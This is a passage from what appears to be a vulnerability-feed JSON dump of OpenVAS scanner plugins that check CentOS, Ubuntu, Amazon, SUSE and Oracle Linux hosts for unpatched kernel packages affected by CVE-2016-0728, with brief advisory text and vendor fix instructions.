FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882377\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-26 06:11:02 +0100 (Tue, 26 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kernel CESA-2016:0064 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kernel\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The kernel packages contain the Linux\nkernel, the core of any Linux operating system.\n\n * A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in certain\nerror path of the join_session_keyring() function. A local, unprivileged\nuser could use this flaw to escalate their privileges on the system.\n(CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
The system must be\nrebooted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"kernel on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2016:0064\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2016-January/021625.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", 
rpm:\"kernel-headers~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.4.5.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-01-20T00:00:00", "id": "OPENVAS:1361412562310842612", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842612", "type": "openvas", "title": "Ubuntu Update for linux-lts-trusty USN-2870-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-trusty USN-2870-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842612\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:49 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-trusty USN-2870-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-trusty'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count when\n joining an existing session keyring. 
A local attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code with\n administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-trusty on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2870-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2870-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-76-generic\", ver:\"3.13.0-76.120~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-76-generic-lpae\", ver:\"3.13.0-76.120~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:55:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2016-01-20T00:00:00", "id": "OPENVAS:1361412562310120632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120632", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-642)", "sourceData": "# Copyright (C) 
2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120632\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 07:22:48 +0200 (Wed, 20 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-642)\");\n script_tag(name:\"insight\", value:\"Perception Point Research identified a use-after-free vulnerability, representing a local privilege escalation vulnerability in the Linux kernel. Their post contains a detailed analysis of the bug.kernel-4.1.13-19.30.amzn1 and earlier versions are impacted.\");\n script_tag(name:\"solution\", value:\"Run yum clean all followed by yum update kernel to update your system. 
You will need to reboot your system in order for the new kernel to be running.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-642.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-debuginfo\", rpm:\"kernel-tools-debuginfo~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf-debuginfo\", rpm:\"perf-debuginfo~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-devel\", rpm:\"kernel-tools-devel~4.1.13~19.31.amzn1\", 
rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-i686\", rpm:\"kernel-debuginfo-common-i686~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~4.1.13~19.31.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2016-01-23T00:00:00", "id": "OPENVAS:1361412562310851161", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851161", "type": "openvas", "title": "SUSE: Security Advisory for kernel (SUSE-SU-2016:0205-1)", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the 
implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851161\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-23 06:12:30 +0100 (Sat, 23 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for kernel (SUSE-SU-2016:0205-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 12 kernel was updated to receive a security fix.\n\n The following security bug was fixed:\n\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. 
(bsc#962075,\n CVE-2016-0728).\");\n\n script_tag(name:\"affected\", value:\"kernel on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:0205-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra-debuginfo\", rpm:\"kernel-default-extra-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", 
rpm:\"kernel-default-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "Oracle 
Linux Local Security Checks ELSA-2016-0064", "modified": "2019-03-14T00:00:00", "published": "2016-01-26T00:00:00", "id": "OPENVAS:1361412562310122858", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122858", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2016-0064", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2016-0064.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122858\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-26 10:12:45 +0200 (Tue, 26 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2016-0064\");\n script_tag(name:\"insight\", value:\"ELSA-2016-0064 - kernel security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2016-0064\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2016-0064.html\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-abi-whitelists\", rpm:\"kernel-abi-whitelists~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-doc\", 
rpm:\"kernel-doc~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.4.5.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-01-20T00:00:00", "id": "OPENVAS:1361412562310842610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842610", "type": "openvas", "title": "Ubuntu Update for linux-lts-utopic USN-2873-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-utopic USN-2873-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; 
